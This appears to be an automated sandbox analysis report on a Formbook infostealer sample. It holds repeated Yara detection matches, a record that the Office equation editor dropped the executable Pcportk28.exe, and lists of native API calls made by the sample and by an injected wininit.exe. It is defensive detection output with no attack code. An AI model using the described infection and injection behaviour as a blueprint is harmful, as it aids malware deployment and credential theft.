Source: Yara match File source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\i4L[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\Pcportk28.exe
Yara signature match
Source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\wininit.exe Code function: String function: 0259F970 appears 82 times
Source: C:\Windows\SysWOW64\wininit.exe Code function: String function: 02573F92 appears 132 times
Source: C:\Windows\SysWOW64\wininit.exe Code function: String function: 0257373B appears 245 times
Source: C:\Windows\SysWOW64\wininit.exe Code function: String function: 0252E2A8 appears 38 times
Source: C:\Windows\SysWOW64\wininit.exe Code function: String function: 0252DF5C appears 119 times
Source: C:\Users\Public\Pcportk28.exe Code function: String function: 0085E2A8 appears 36 times
Source: C:\Users\Public\Pcportk28.exe Code function: String function: 008CF970 appears 78 times
Source: C:\Users\Public\Pcportk28.exe Code function: String function: 008A373B appears 214 times
Source: C:\Users\Public\Pcportk28.exe Code function: String function: 008A3F92 appears 110 times
Source: C:\Users\Public\Pcportk28.exe Code function: String function: 0085DF5C appears 105 times
Contains functionality to call native functions
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_004185E0 NtCreateFile, 5_2_004185E0
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_00418690 NtReadFile, 5_2_00418690
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_00418710 NtClose, 5_2_00418710
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_004187C0 NtAllocateVirtualMemory, 5_2_004187C0
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_004185DA NtCreateFile, 5_2_004185DA
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0041870B NtClose, 5_2_0041870B
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_008500C4 NtCreateFile,LdrInitializeThunk, 5_2_008500C4
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_00850048 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_00850048
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_00850078 NtResumeThread,LdrInitializeThunk, 5_2_00850078
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_008507AC NtCreateMutant,LdrInitializeThunk, 5_2_008507AC
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084F9F0 NtClose,LdrInitializeThunk, 5_2_0084F9F0
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084F900 NtReadFile,LdrInitializeThunk, 5_2_0084F900
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_0084FAD0
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FAE8 NtQueryInformationProcess,LdrInitializeThunk, 5_2_0084FAE8
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FBB8 NtQueryInformationToken,LdrInitializeThunk, 5_2_0084FBB8
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FB68 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_0084FB68
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_0084FC90
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FC60 NtMapViewOfSection,LdrInitializeThunk, 5_2_0084FC60
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FD8C NtDelayExecution,LdrInitializeThunk, 5_2_0084FD8C
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FDC0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_0084FDC0
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FEA0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_0084FEA0
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_0084FED0
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FFB4 NtCreateSection,LdrInitializeThunk, 5_2_0084FFB4
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_008510D0 NtOpenProcessToken, 5_2_008510D0
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_00850060 NtQuerySection, 5_2_00850060
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_008501D4 NtSetValueKey, 5_2_008501D4
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0085010C NtOpenDirectoryObject, 5_2_0085010C
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_00851148 NtOpenThread, 5_2_00851148
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084F8CC NtWaitForSingleObject, 5_2_0084F8CC
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_00851930 NtSetContextThread, 5_2_00851930
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084F938 NtWriteFile, 5_2_0084F938
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FAB8 NtQueryValueKey, 5_2_0084FAB8
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FA20 NtQueryInformationFile, 5_2_0084FA20
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FA50 NtEnumerateValueKey, 5_2_0084FA50
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FBE8 NtQueryVirtualMemory, 5_2_0084FBE8
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FB50 NtCreateKey, 5_2_0084FB50
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FC30 NtOpenProcess, 5_2_0084FC30
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_00850C40 NtGetContextThread, 5_2_00850C40
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_0084FC48 NtSetInformationFile, 5_2_0084FC48
Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_00851D80 NtSuspendThread, 5_2_00851D80
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_025200C4 NtCreateFile,LdrInitializeThunk, 7_2_025200C4
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_025207AC NtCreateMutant,LdrInitializeThunk, 7_2_025207AC
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_0251FAD0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FAE8 NtQueryInformationProcess,LdrInitializeThunk, 7_2_0251FAE8
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FAB8 NtQueryValueKey,LdrInitializeThunk, 7_2_0251FAB8
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FB50 NtCreateKey,LdrInitializeThunk, 7_2_0251FB50
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FB68 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_0251FB68
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FBB8 NtQueryInformationToken,LdrInitializeThunk, 7_2_0251FBB8
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251F900 NtReadFile,LdrInitializeThunk, 7_2_0251F900
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251F9F0 NtClose,LdrInitializeThunk, 7_2_0251F9F0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_0251FED0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FFB4 NtCreateSection,LdrInitializeThunk, 7_2_0251FFB4
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_0251FC60
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FDC0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_0251FDC0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FD8C NtDelayExecution,LdrInitializeThunk, 7_2_0251FD8C
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_02520048 NtProtectVirtualMemory, 7_2_02520048
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_02520078 NtResumeThread, 7_2_02520078
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_02520060 NtQuerySection, 7_2_02520060
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_025210D0 NtOpenProcessToken, 7_2_025210D0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_02521148 NtOpenThread, 7_2_02521148
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0252010C NtOpenDirectoryObject, 7_2_0252010C
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_025201D4 NtSetValueKey, 7_2_025201D4
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0251FA50 NtEnumerateValueKey, 7_2_0251FA50
